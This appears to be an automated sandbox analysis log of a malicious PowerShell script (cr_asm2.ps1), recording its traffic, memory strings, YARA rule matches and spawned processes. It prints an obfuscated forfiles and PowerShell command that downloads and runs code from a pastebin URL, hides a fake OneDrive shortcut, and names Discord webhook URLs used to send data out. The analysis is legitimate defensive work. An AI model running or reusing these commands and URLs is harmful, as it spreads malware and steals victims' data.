Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 212Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:09:20 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008561x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IuvgeefU3WOfWLXxU821yY8l2W3D3OVvSTdv29IsTGggJ%2BbSwcGcy9vlwsby%2BxGLvM0XvFVfeiZkBdJg15oGSfWGTXWNn%2BAEVw9AQdRytC82DGFlxVnUTPdXQFBl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=5ca6535c53572a9fb4740a13c8f20b6b84bf0c49-1729008560; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=5Z5HirTMJiqMah4cuwg2epei3iYHTsgcBLIqq9dn78M-1729008560237-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3112ac5c0f3abf-DFW{"message": "Unknown Webhook", "code": 10015}
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:09:35 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008576x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36kcIfgf4Ww7B5a4qmxA8errYHltms%2BDzrWAFvuNXxxnN0gMa7GpuiW5Nx6qU3QwWy2SX5bel8uEykUdl%2F30cN6lwff4QaVcSzNUpPDH4Dy2qV0xxCPLI%2FIJ5yND"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=593086c6c7501533514da0d261e42bf2bed5f56f-1729008575; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=AAC46UkwxbGeIv6p3oOUBX6MdznZEgqj2V6FvTzVxdw-1729008575368-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d31130adaec4868-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:09:42 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008583x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeeqasR%2FZ6glquLr4%2B9dp7W0sNckTtdzDwNJOHAmbirIFh272ZDh91349DAhFb9g5tQ5Ltr8ERpfeWRbMlUMh7rWyph9soS8ZXqkV%2FjyefiCPxSJh2ucL7rr7oNF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=ad6b0aeed1f819c30f3ac52fe64b31000bd6c0e4-1729008582; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=rHbUkHVL_Dtr1GPodamzi5DJ4MkV4S2_jFKvssroiBA-1729008582012-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d311334f8242e22-DFW
Source: powershell.exe, 00000000.00000002.2179609797.0000021C7722F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.z
Source: powershell.exe, 00000000.00000002.2180083104.0000021C772BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 0000000F.00000002.2476383382.000002D1B7EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.2150248824.0000021C5F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.0000019858AFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A11C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000000.00000002.2175097875.0000021C6EFF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2175097875.0000021C6F134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2357162809.0000019858096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.00000198580B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.0000019857B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A076E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A0788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A021C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000F.00000002.2420329462.000002D1A021C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000000.00000002.2150248824.0000021C5F1F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.2357162809.000001985815E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.000001985812F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A081E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A083A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000F.00000002.2420329462.000002D1A081E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000000.00000002.2150248824.0000021C5EF81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.00000198576D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D19FDA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2150248824.0000021C5F1F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2179466916.0000021C770E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cow
Source: powershell.exe, 00000000.00000002.2150248824.0000021C5EF81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.0000019857689000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.000001985769C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D19FD51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D19FD6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2175097875.0000021C6F134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2175097875.0000021C6F134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2175097875.0000021C6F134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2357162809.0000019858AFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A11C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000000.00000002.2150248824.0000021C5F5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2150248824.0000021C5F5F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2150248824.0000021C5F1A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2150248824.0000021C5F1F9000.00000004.00000800.00020000.00000000.sdmp, cr_asm2.ps1String found in binary or memory: https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpT
Source: powershell.exe, 0000000A.00000002.2357162809.0000019858AFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A11C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/129575196622756
Source: powershell.exe, 0000000A.00000002.2357162809.00000198581C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A08E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGM
Source: powershell.exe, 0000000F.00000002.2420329462.000002D1A08E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A08C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A07A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A08BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A08D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A11C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A08DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewv
Source: powershell.exe, 00000000.00000002.2150248824.0000021C5F1F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2150248824.0000021C6001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.0000019857B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A021C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2175097875.0000021C6EFF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2175097875.0000021C6F134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000A.00000002.2357162809.0000019858096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A0778000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000A.00000002.2357162809.0000019858096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A076E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A0778000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000A.00000002.2357162809.000001985815E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A083A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000000.00000002.2150248824.0000021C5F1A5000.00000004.00000800.00020000.00000000.sdmp, cr_asm2.ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/OneDriveFileSync.dll
Source: powershell.exe, 00000000.00000002.2150248824.0000021C5F1A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.00000198580D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2357162809.00000198580B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A07B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2420329462.000002D1A0788000.00000004.00000800.00020000.00000000.sdmp, cr_asm2.ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49797 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_280.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_5368.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 280, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7EE7E60_2_00007FFD9B7EE7E6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7EF5920_2_00007FFD9B7EF592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B80B96610_2_00007FFD9B80B966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B80C71210_2_00007FFD9B80C712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B80D1B110_2_00007FFD9B80D1B1
Source: amsi64_280.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_5368.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 280, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal88.troj.expl.evad.winPS1@20/21@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5vcsp41.ykc.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm2.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B3F.tmp" "c:\Users\user\AppData\Local\Temp\j0w3v5ey\CSCE8CC0B62BF5148F19D819A5B292CA929.TMP"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B3F.tmp" "c:\Users\user\AppData\Local\Temp\j0w3v5ey\CSCE8CC0B62BF5148F19D819A5B292CA929.TMP"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
